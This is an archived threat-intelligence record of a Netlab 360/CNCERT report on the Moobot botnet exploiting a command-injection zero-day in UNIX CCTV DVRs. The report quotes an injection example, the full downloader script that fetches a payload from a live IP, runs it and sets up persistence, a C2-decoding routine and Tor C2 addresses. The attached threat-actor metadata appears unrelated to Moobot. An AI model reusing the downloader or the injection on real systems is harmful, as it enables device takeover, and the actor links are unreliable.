{
	"id": "641a7e8b-7df0-4e5d-85ee-d10ed0639c3f",
	"created_at": "2026-04-06T00:08:48.376701Z",
	"updated_at": "2026-04-10T13:12:26.563378Z",
	"deleted_at": null,
	"sha1_hash": "9684cfcefcee4b636d4a126b7fd54e16c0ff07c6",
	"title": "MooBot on the run using another 0 day targeting UNIX CCTV DVR",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1148960,
	"plain_text": "MooBot on the run using another 0 day targeting UNIX CCTV\r\nDVR\r\nBy Hui Wang\r\nPublished: 2020-11-20 · Archived: 2026-04-05 13:43:33 UTC\r\nThis report is jointly issued by CNCERT and Qihoo 360\r\nOverview\r\nMoobot is a botnet we first reported in September 2019[1]. It has been pretty active since its appearance, and we\r\nhave previously reported that it is able to exploit 0day vulnerabilities[2][3].\r\nIn June, we were able to confirm that another 0day had been used by Moobot, targeting UNIX CCTV DVR/NVR\r\ndevices (see below for the device list). We notified the manufacturer, and patches have been issued [ALL265 unix\r\n2.3.7.8B09][NVR unix 2.3.7.8B05][ALL unixip 2.3.4.8B06].\r\nTimeline\r\n2020-06-09 We saw the scans targeting the vulnerability\r\n2020-06-24 A Moobot sample spread by exploiting this vulnerability was captured by us\r\n2020-08-24 Manufacturers released patches\r\nVulnerability exploitation process\r\nMoobot scans port 8000 through its Loader; after locating the right target device, Moobot samples are dropped\r\nvia the vulnerability.\r\nVulnerability analysis\r\nVulnerability type\r\nRemote command injection vulnerability\r\nVulnerability details\r\nOn the vulnerable devices, a gui process runs and listens on port 8000. According to the device manual, we\r\nknow that this port is the default listening port for DVR Watch, Search, and Setup functions.\r\nhttps://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/\r\nPage 1 of 11\n\nThe port has the function of remotely updating the system time, which is actually implemented by the gui\r\nprocess calling the system command ntpdate . This is where the problem is. When the gui program executes the\r\nntpdate command, the NTP server parameter is not checked, resulting in a command injection vulnerability.\r\nFor example, the command ( ntpdate -d -t 1 time.nist.gov\u0026 whoami ) will lead to the execution of the whoami\r\ncommand. 
Part of the payload is as follows; we will not share more details or a PoC here due to security concerns.\r\nAffected equipment analysis\r\nBy scanning port 8000 across the entire network, we found about 6k online devices. Most of the equipment is in\r\nthe United States.\r\nGeographical distribution of affected equipment\r\n4529 United_States\r\n 789 Republic_of_Korea\r\n 84 Canada\r\n 73 Japan\r\n 66 Netherlands\r\n 56 Australia\r\n 55 Germany\r\n 31 United_Kingdom\r\n 23 Viet_Nam\r\n 19 Malaysia\r\n 15 Saudi_Arabia\r\n 15 Czech\r\n 14 Switzerland\r\n 11 China\r\nKnown affected devices:\r\n 51 PVT-N5UNIXDVR 1\r\n 28 PVT-8MUNIXDVR 1\r\n 28 NVST-ILUNIXDVR 1\r\n 25 NVST-ILUNIXNVR 1\r\n 22 Magic-U-8M5UNIXDVR 1\r\n 14 NVST-IPUNIXNVR 1\r\n 13 NVST-IPUNIXDVR 1\r\n 9 Magic-T-8M5UNIXDVR 1\r\n 9 HD-Analog3RDVR 1\r\n 6 Magic-QXUNIXDVR 1\r\n 2 Magic-U-8M5UNIXDVR 2\r\n 1 PVT-8MUNIXDVR\r\n 1 NVR3RGPardisNVR\r\n 1 Magic-U-8M5UNIXBoca DVR\r\n 1 MER-28N16ENEODVR 1\r\n 1 MER-28N08ENEODVR 1\r\nSample analysis\r\nVerdict:Downloader\r\nMD5:af3720d0141d246bd3ede434f7a14dcb\r\nASCII text, with CRLF line terminators\r\naf3720d0141d246bd3ede434f7a14dcb is a download script; its content is as follows:\r\ns=o;cd /cmslite;wget http://205.185.116.68/boot -O-|gzip -d \u003e .\"$s\";chmod +x .\"$s\";./.\"$s\" balloon;\r\necho -e \"echo \\\"Starting logging\\\"\\nklogd\\nsyslogd -O /dvr/message -s 4000\\n/cmslite/.o balloon;\" \u003e /etc/init.d/\r\nIt can be seen that the main functions of the Downloader are:\r\nDownload Moobot sample\r\nAchieve persistence\r\nIt is worth mentioning that the downloaded Moobot samples are compressed, which to some extent affects\r\nsecurity products' detection of samples at the network traffic level.\r\nVerdict:Moobot_leet\r\nMD5:fb96c74e0548bd41621ea0dd98e8b2bb\r\nELF 32-bit LSB executable, ARM, version 1 (ARM), 
statically linked, stripped\r\nPacker:No\r\nLib:uclibc\r\nfb96c74e0548bd41621ea0dd98e8b2bb is a Moobot variant. Because it reuses LeetHozer's encryption\r\nmethod, we call it Moobot_leet. Moobot_leet is very similar to Mirai at the host behavior level and has no real\r\nhighlights, so in this blog we will just talk about its encryption method and communication protocol. The\r\nsample uses Tor proxies, a large number of proxy nodes are embedded, and the Tor-C2 is encrypted.\r\nEncryption method\r\nMoobot_leet divides the Tor-C2 into two parts, a prefix (16 bytes) and a suffix (7 bytes), which are stored in different\r\npositions of the sample. LeetHozer's encryption method is adopted, and the correct Tor-C2 can only be\r\ndecrypted by combining the two parts.\r\nThe decryption method is as follows:\r\nxorkey = \"qE6MGAbI\"\r\n\r\ndef decode_str(ctxt):\r\n    # One pass over the whole ciphertext per key byte\r\n    for i in range(0, len(xorkey)):\r\n        plain = \"\"\r\n        size = len(ctxt)\r\n        for idx in range(0, size):\r\n            ch = ord(ctxt[idx])\r\n            # XOR each byte with (key byte + position in the string)\r\n            ch ^= (ord(xorkey[i]) + idx)\r\n            plain += chr(ch)\r\n        ctxt = plain\r\n    return ctxt\r\n\r\nTake the prefix ( 0D 02 50 08 10 18 12 06 17 17 61 77 7A 79 6A 97 ) and the suffix ( CC 81 88 BB BD B8 DE ) as\r\nan example: splicing them gives the ciphertext ( 0D 02 50 08 10 18 12 06 17 17 61 77 7A 79 6A 97 CC 81 88 BB BD B8\r\nDE ), which decrypts to the Tor-C2 ol6zbnlduigehodu.onion .\r\nThe strange thing is that from the code level ( random mod 7 ), it can be seen that there should be 7 Tor-C2, but\r\nthere are only 3 in the actual sample, which will cause the bot to access non-legitimate Tor-C2 addresses. 
We guess it may be a\r\nmethod used to disrupt security researchers \u0026 to throw false negatives at the sandbox IOC automatic extraction\r\nsystem.\r\nCommunication protocol\r\nAn overview of Moobot_leet network traffic is as follows:\r\nFirst, the bot establishes a connection with a proxy node built into the sample, then establishes a connection with the Tor-C2,\r\nand finally uses the normal Moobot communication protocol to notify the C2 that it is alive and can receive the attack\r\ncommands issued by the C2.\r\n1. Establish a connection with the proxy; the port is 9050\r\nThe sample contains a hardcoded list of proxy nodes.\r\n2. Establish a connection with C2 through the Tor-Proxy protocol\r\nThe sample's hardcoded Tor-C2 list is as follows:\r\nol6zbnlduigehodu.onion:1900\r\nuajl7qmdquxaramd.onion:554\r\nnhez3ihtwxwthjkm.onion:21\r\n3. 
Communicate with C2 through the Moobot protocol; the specific go-live, heartbeat, and attack packets are\r\nas follows\r\nRegister package\r\n msg parsing\r\n ----------------------------------------------------------------\r\n 33 66 99 -----\u003e hardcoded magic\r\n 07 -----\u003e group string length\r\n 62 61 6c 6c 6f 6f 6e -----\u003e group string, here it is \"balloon\"\r\nHeartbeat package\r\n msg parsing\r\n ----------------------------------------------------------------\r\n c7 15 3a fa -----\u003e random 4 bytes msg from bot\r\n c7 15 3a fa -----\u003e 4 bytes msg from c2\r\nThe attack command is similar to Mirai's\r\n00000000: 01 00 00 00 3C 01 C2 0F 92 0C 20 02 01 00 05 32 ....\u003c..... ....2\r\n00000010: 38 30 31 35 02 00 04 31 34 36 30 02 1C 8015...1460..\r\nMoobot DDoS campaign\r\nMoobot's DDoS attacks are active all year round, and our previous article also introduced Moobot's attacks [1].\r\nHere are the DDoS targets of attacks launched by Moobot (we noticed electrum.hodlister.co has been attacked by this\r\nMoobot nonstop for a few months now).\r\nReaders are always welcome to reach us on twitter or email us at netlab at 360 dot cn.\r\nIoC\r\nTor-C2\r\nSample MD5\r\nDownloader URL\r\nScanner IP\r\nSource: https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/"
	],
	"report_names": [
		"moobot-0day-unixcctv-dvr-en"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434128,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.pdf",
		"text": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.txt",
		"img": "https://archive.orkl.eu/9684cfcefcee4b636d4a126b7fd54e16c0ff07c6.jpg"
	}
}